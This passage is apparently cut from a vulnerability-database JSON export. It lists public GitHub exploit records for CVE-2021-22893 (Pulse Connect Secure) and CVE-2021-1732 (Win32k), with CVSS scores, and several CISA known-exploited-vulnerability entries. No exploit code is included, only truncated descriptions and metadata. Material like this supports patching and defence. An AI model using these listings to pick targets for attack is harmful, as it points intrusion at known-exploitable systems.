"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "8DBBEAEC-C905-52CD-B95C-87663EA9C145", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:57:25", "description": "# CVE-2021-22893\nPulse Connect...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-21T10:09:56", "type": "githubexploit", "title": "Exploit for Improper Authentication in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-12-15T14:41:55", "id": "241CA368-5AF2-555C-91EE-5D10B229F97D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T22:59:30", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Improper Authentication in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2022-08-17T19:20:50", "id": "51858F11-1259-5A40-82DF-DD7D62A7B11A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:28:09", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "7CEBB62C-173B-50CD-A252-B6522523EE57", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:19:38", "description": "# CVE-2021-22893\nProof-of-Concept (PoC) script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-03T21:46:58", "type": "githubexploit", "title": "Exploit for Use After Free in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2023-01-31T14:33:59", "id": "E90678A1-4183-5E58-A4E2-5E48E8767D92", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-18T12:50:14", "description": "# CVE-2021-1732-Exploit\nCVE-2021-1...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-02T01:35:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-12-18T11:55:36", "id": "1D0AAF42-5E68-5985-A800-90937D55628D", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-16T10:32:27", "description": "# CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T02:13:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-02-16T09:53:06", "id": "DEAA3BF4-9E7D-55E9-9534-6203A312C46F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-13T10:29:32", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T05:07:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-06-13T06:40:53", "id": "91A5BC48-2410-555B-B7FB-8138577D6B78", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:55:12", "description": "# CVE-2021-1732-Exploit\nCVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-05T02:11:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-08-15T15:41:27", "id": "02C6FE13-5036-5BE5-8AC8-278A918BA581", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:37:09", "description": "# CVE-2021-1732\n\n- \u6f0f\u6d1e\u53d1\u751f\u5728Windows \u56fe\u5f62\u9a71\u52a8`win32kfull!NtUserCreateWind...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T01:28:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-11-08T01:36:42", "id": "0885D472-B052-5B6B-A8C9-19FDD33EFF42", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T16:12:24", "description": "<h1 style=\"font-size:10vw\" align=\"center\">Windows Privilege Esca...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-25T12:55:15", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2022-06-10T10:41:19", "id": "5E516DC2-BF71-57D0-9A87-3874146D0F83", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-09T08:09:06", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-09T07:14:45", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2023-03-09T07:15:31", "id": "87746757-7ADF-518B-8EA1-A11AC7E420FC", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-09T08:27:55", "description": "# CVE-2021-1732\nCVE-\u00ad2021\u00ad-1732 Microsoft Windows 10 \u672c\u5730\u63d0\u6743\u6f0f \u7814\u7a76\u53caPo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-01T13:06:17", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2023-03-09T07:13:06", "id": "237105AA-3579-5C91-BC0F-55BF93EC18DD", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-22893\nTHIS IS NOT A REAL EXPLOIT IT IS A HONEYPOC (ht...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T09:48:57", "type": "githubexploit", "title": "Exploit for Improper Authentication in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350", "CVE-2021-22893"], "modified": "2022-02-07T18:34:52", "id": "730EEC4F-BE81-5690-BA8D-B89482C5C3D0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T13:00:38", "description": "# CVE-2022-21882\nwin32k LPE bypass CVE-2021-1732\n\n## Test\n- only...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-01T17:58:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-04-04T09:10:13", "id": "453B4EEE-340B-58DA-84D9-277C9D4EFC12", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Kernel Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31955", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Windows NTFS Privilege Escalation Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows NTFS Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31956", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-09T23:10:03", "description": "Vulnerability to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Pulse Connect Secure Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-22893", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Allows remote attackers to execute arbitrary code via a crafted document, aka \"Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Office/WordPad Remote Code Execution Vulnerability with Windows API", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-0199", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Win32k Privilege Escalation Vulnerability. This CVE ID is unique from CVE-2021-27072.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Win32k Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-28310", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": 